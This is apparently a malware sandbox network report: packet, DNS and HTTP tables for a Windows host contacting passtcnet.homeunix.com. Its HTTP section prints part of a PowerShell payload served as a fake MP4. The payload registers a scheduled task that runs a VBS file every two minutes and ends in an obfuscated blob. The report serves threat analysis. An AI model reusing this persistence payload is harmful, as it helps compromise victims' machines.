Aug 29, 2024 18:37:34.157852888 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.157866955 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.157881975 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.157902956 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.159302950 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.159317017 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.159339905 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.160898924 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.160937071 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.171139956 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.171663046 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.171679020 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.171701908 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.172857046 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.172873020 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.172902107 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.173739910 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.173753023 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.173777103 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.174822092 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.174837112 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.174859047 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.217067003 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.217108965 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.217447996 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.217461109 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.217509985 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.218497992 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.218934059 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.218945980 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.218974113 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.220278025 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.220293999 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.220321894 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.221784115 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.221798897 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.221894026 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.223042011 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.223057032 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.223078012 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.224427938 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.224447012 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.224461079 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.224467039 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.224490881 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.225820065 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.225835085 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.225883961 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.226994038 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.227009058 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.227045059 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.228059053 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.228075027 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.228092909 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.228107929 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.239814997 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.239861012 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.240003109 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.240016937 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.240047932 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.240978003 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.240991116 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.241033077 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.241914034 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.241930008 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.241965055 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.242959976 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.242975950 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.242989063 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.243026972 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.243597031 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.244025946 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.244041920 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.244065046 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.245044947 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.245059013 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.245083094 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.246104002 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.246119022 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.246145964 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.247137070 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.247152090 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.247164965 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.247173071 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.247206926 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.248191118 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.248205900 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.248240948 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.249198914 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.249213934 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.249247074 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.288758993 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.289206982 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.289222002 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.289247990 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.290754080 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.290769100 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.290790081 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.291523933 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.291537046 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.291558981 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.291945934 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.291960001 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.291976929 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.291976929 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.292004108 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.292989016 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.293001890 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.293037891 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.293962002 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.293975115 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.294013023 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.295084953 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.295097113 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.295137882 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.296056032 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.296070099 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.296083927 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.296101093 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.297461987 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.297475100 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.297492981 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.298882961 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.298896074 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.298909903 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.298919916 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.298923969 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.298934937 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.298937082 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.298979044 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.309894085 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.310128927 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:34.310159922 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:34.431698084 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:35.235157013 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:35.235183954 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:37:35.235336065 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:35.235847950 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:35.235861063 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:37:35.903778076 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:37:35.904248953 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:35.904273033 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:37:35.905216932 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:37:35.905277014 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:35.911298990 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:35.911371946 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:37:35.952713013 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:35.952727079 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:37:35.988945007 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:35.988993883 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:35.989079952 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:35.991136074 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:35.991147995 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:35.999571085 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:36.633290052 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:36.633354902 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:36.639707088 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:36.639724970 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:36.639976025 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:36.687092066 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:36.703083992 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:36.744499922 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:36.906260967 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:36.906311035 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:36.906497002 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:36.906672955 CEST	49740	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:36.906692982 CEST	443	49740	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:36.995055914 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:36.995105028 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:36.995179892 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:36.995815039 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:36.995831966 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:37.637404919 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:37.637476921 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:37.661333084 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:37.661355972 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:37.661652088 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:37.665488005 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:37.712501049 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:37.919941902 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:37.920011997 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:37.920085907 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:37.920924902 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:37.920943022 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:37.920958042 CEST	49741	443	192.168.2.4	184.28.90.27
Aug 29, 2024 18:37:37.920964003 CEST	443	49741	184.28.90.27	192.168.2.4
Aug 29, 2024 18:37:39.374619007 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:39.374690056 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:40.978462934 CEST	49736	80	192.168.2.4	43.130.11.15
Aug 29, 2024 18:37:40.983685017 CEST	80	49736	43.130.11.15	192.168.2.4
Aug 29, 2024 18:37:45.795254946 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:37:45.795320988 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:37:45.795393944 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:46.970351934 CEST	49739	443	192.168.2.4	216.58.212.132
Aug 29, 2024 18:37:46.970377922 CEST	443	49739	216.58.212.132	192.168.2.4
Aug 29, 2024 18:38:35.678500891 CEST	49750	443	192.168.2.4	142.250.186.68
Aug 29, 2024 18:38:35.678533077 CEST	443	49750	142.250.186.68	192.168.2.4
Aug 29, 2024 18:38:35.678742886 CEST	49750	443	192.168.2.4	142.250.186.68
Aug 29, 2024 18:38:35.678982019 CEST	49750	443	192.168.2.4	142.250.186.68
Aug 29, 2024 18:38:35.678997993 CEST	443	49750	142.250.186.68	192.168.2.4
Aug 29, 2024 18:38:36.335880995 CEST	443	49750	142.250.186.68	192.168.2.4
Aug 29, 2024 18:38:36.336535931 CEST	49750	443	192.168.2.4	142.250.186.68
Aug 29, 2024 18:38:36.336555958 CEST	443	49750	142.250.186.68	192.168.2.4
Aug 29, 2024 18:38:36.336879969 CEST	443	49750	142.250.186.68	192.168.2.4
Aug 29, 2024 18:38:36.337591887 CEST	49750	443	192.168.2.4	142.250.186.68
Aug 29, 2024 18:38:36.337649107 CEST	443	49750	142.250.186.68	192.168.2.4
Aug 29, 2024 18:38:36.390727997 CEST	49750	443	192.168.2.4	142.250.186.68
Aug 29, 2024 18:38:36.406547070 CEST	49723	80	192.168.2.4	199.232.214.172
Aug 29, 2024 18:38:36.406898022 CEST	49724	80	192.168.2.4	199.232.214.172
Aug 29, 2024 18:38:36.412065029 CEST	80	49723	199.232.214.172	192.168.2.4
Aug 29, 2024 18:38:36.412270069 CEST	49723	80	192.168.2.4	199.232.214.172
Aug 29, 2024 18:38:36.412769079 CEST	80	49724	199.232.214.172	192.168.2.4
Aug 29, 2024 18:38:36.412832022 CEST	49724	80	192.168.2.4	199.232.214.172
Aug 29, 2024 18:38:46.245889902 CEST	443	49750	142.250.186.68	192.168.2.4
Aug 29, 2024 18:38:46.245965958 CEST	443	49750	142.250.186.68	192.168.2.4
Aug 29, 2024 18:38:46.246016979 CEST	49750	443	192.168.2.4	142.250.186.68
Aug 29, 2024 18:38:47.257484913 CEST	49750	443	192.168.2.4	142.250.186.68
Aug 29, 2024 18:38:47.257515907 CEST	443	49750	142.250.186.68	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 18:37:30.521537066 CEST	53	57673	1.1.1.1	192.168.2.4
Aug 29, 2024 18:37:30.759644985 CEST	53	61178	1.1.1.1	192.168.2.4
Aug 29, 2024 18:37:32.047765970 CEST	53	54026	1.1.1.1	192.168.2.4
Aug 29, 2024 18:37:32.226820946 CEST	57717	53	192.168.2.4	1.1.1.1
Aug 29, 2024 18:37:32.227201939 CEST	53785	53	192.168.2.4	1.1.1.1
Aug 29, 2024 18:37:32.437622070 CEST	53	53785	1.1.1.1	192.168.2.4
Aug 29, 2024 18:37:32.843489885 CEST	53	57717	1.1.1.1	192.168.2.4
Aug 29, 2024 18:37:35.223269939 CEST	56416	53	192.168.2.4	1.1.1.1
Aug 29, 2024 18:37:35.223957062 CEST	61264	53	192.168.2.4	1.1.1.1
Aug 29, 2024 18:37:35.232664108 CEST	53	56416	1.1.1.1	192.168.2.4
Aug 29, 2024 18:37:35.232872963 CEST	53	61264	1.1.1.1	192.168.2.4
Aug 29, 2024 18:37:47.991677999 CEST	138	138	192.168.2.4	192.168.2.255
Aug 29, 2024 18:37:48.903995991 CEST	53	55791	1.1.1.1	192.168.2.4
Aug 29, 2024 18:38:08.095237017 CEST	53	50548	1.1.1.1	192.168.2.4
Aug 29, 2024 18:38:30.357554913 CEST	53	54189	1.1.1.1	192.168.2.4
Aug 29, 2024 18:38:30.986113071 CEST	53	52388	1.1.1.1	192.168.2.4
Aug 29, 2024 18:38:35.273641109 CEST	59697	53	192.168.2.4	1.1.1.1
Aug 29, 2024 18:38:35.274127007 CEST	52596	53	192.168.2.4	1.1.1.1
Aug 29, 2024 18:38:35.283307076 CEST	53	59697	1.1.1.1	192.168.2.4
Aug 29, 2024 18:38:35.284121990 CEST	53	52596	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 18:37:32.226820946 CEST	192.168.2.4	1.1.1.1	0x77cf	Standard query (0)	passtcnet.homeunix.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 18:37:32.227201939 CEST	192.168.2.4	1.1.1.1	0x429	Standard query (0)	passtcnet.homeunix.com	65	IN (0x0001)	false
Aug 29, 2024 18:37:35.223269939 CEST	192.168.2.4	1.1.1.1	0x6143	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 18:37:35.223957062 CEST	192.168.2.4	1.1.1.1	0xcb01	Standard query (0)	www.google.com	65	IN (0x0001)	false
Aug 29, 2024 18:38:35.273641109 CEST	192.168.2.4	1.1.1.1	0x69bc	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 18:38:35.274127007 CEST	192.168.2.4	1.1.1.1	0xfc23	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 18:37:32.843489885 CEST	1.1.1.1	192.168.2.4	0x77cf	No error (0)	passtcnet.homeunix.com		43.130.11.15	A (IP address)	IN (0x0001)	false
Aug 29, 2024 18:37:35.232664108 CEST	1.1.1.1	192.168.2.4	0x6143	No error (0)	www.google.com		216.58.212.132	A (IP address)	IN (0x0001)	false
Aug 29, 2024 18:37:35.232872963 CEST	1.1.1.1	192.168.2.4	0xcb01	No error (0)	www.google.com			65	IN (0x0001)	false
Aug 29, 2024 18:37:45.449043989 CEST	1.1.1.1	192.168.2.4	0xeffb	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 18:37:45.449043989 CEST	1.1.1.1	192.168.2.4	0xeffb	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Aug 29, 2024 18:38:03.993298054 CEST	1.1.1.1	192.168.2.4	0x388e	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 18:38:03.993298054 CEST	1.1.1.1	192.168.2.4	0x388e	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Aug 29, 2024 18:38:35.283307076 CEST	1.1.1.1	192.168.2.4	0x69bc	No error (0)	www.google.com		142.250.186.68	A (IP address)	IN (0x0001)	false
Aug 29, 2024 18:38:35.284121990 CEST	1.1.1.1	192.168.2.4	0xfc23	No error (0)	www.google.com			65	IN (0x0001)	false

HTTP Request Dependency Graph

fs.microsoft.com

passtcnet.homeunix.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	43.130.11.15	80	5236	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 18:37:32.853456020 CEST	446	OUT	GET /amj/2.mp4 HTTP/1.1 Host: passtcnet.homeunix.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Aug 29, 2024 18:37:33.442414999 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 16:37:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Mon, 15 Jul 2024 16:16:32 GMT ETag: "2b52c-61d4b8d619800" Accept-Ranges: bytes Content-Length: 177452 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: video/mp4 Data Raw: 0d 0a 24 43 6f 6e 74 65 6e 74 20 3d 20 40 27 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 31 36 22 3f 3e 0d 0a 3c 54 61 73 6b 20 76 65 72 73 69 6f 6e 3d 22 31 2e 34 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 32 30 30 34 2f 30 32 2f 6d 69 74 2f 74 61 73 6b 22 3e 0d 0a 20 20 3c 54 72 69 67 67 65 72 73 3e 0d 0a 20 20 20 20 3c 54 69 6d 65 54 72 69 67 67 65 72 3e 0d 0a 20 20 20 20 20 20 3c 52 65 70 65 74 69 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 49 6e 74 65 72 76 61 6c 3e 50 54 32 4d 3c 2f 49 6e 74 65 72 76 61 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 53 74 6f 70 41 74 44 75 72 61 74 69 6f 6e 45 6e 64 3e 66 61 6c 73 65 3c 2f 53 74 6f 70 41 74 44 75 72 61 74 69 6f 6e 45 6e 64 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 65 70 65 74 69 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 3c 53 74 61 72 74 42 6f 75 6e 64 61 72 79 3e 32 30 32 33 2d 30 31 2d 30 31 54 30 [TRUNCATED] Data Ascii: $Content = @'<?xml version="1.0" encoding="UTF-16"?><Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <TimeTrigger> <Repetition> <Interval>PT2M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <StartBoundary>2023-01-01T00:00:00</StartBoundary> <Enabled>true</Enabled> </TimeTrigger> </Triggers> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </Idle
Aug 29, 2024 18:37:33.442544937 CEST	1236	IN	Data Raw: 53 65 74 74 69 6e 67 73 3e 0d 0a 20 20 20 20 3c 41 6c 6c 6f 77 53 74 61 72 74 4f 6e 44 65 6d 61 6e 64 3e 74 72 75 65 3c 2f 41 6c 6c 6f 77 53 74 61 72 74 4f 6e 44 65 6d 61 6e 64 3e 0d 0a 20 20 20 20 3c 45 6e 61 62 6c 65 64 3e 74 72 75 65 3c 2f 45 Data Ascii: Settings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> </Settings> <Actions Context="Author"> <Exec> <Command>C:\Users\Public\Music\TvMusic.vbs</Command>
Aug 29, 2024 18:37:33.442559004 CEST	1236	IN	Data Raw: 2a 2a 2a 35 2a 21 35 2a 2a 2a 2a 21 43 2a 31 2a 33 2a 2a 42 45 2a 41 45 2a 44 39 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 45 2a 2a 2a 32 32 32 31 2a 42 2a 31 33 2a 2a 2a 2a 2a 21 21 2a 2a 2a 2a 2a 2a 2a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a Data Ascii: **5!5***!C13BEAED9*************E2221B13**!!***/********3E/3**2***8*******12*****2*!***********!************C****2*********3!85*1*1*****1*1*********1*****
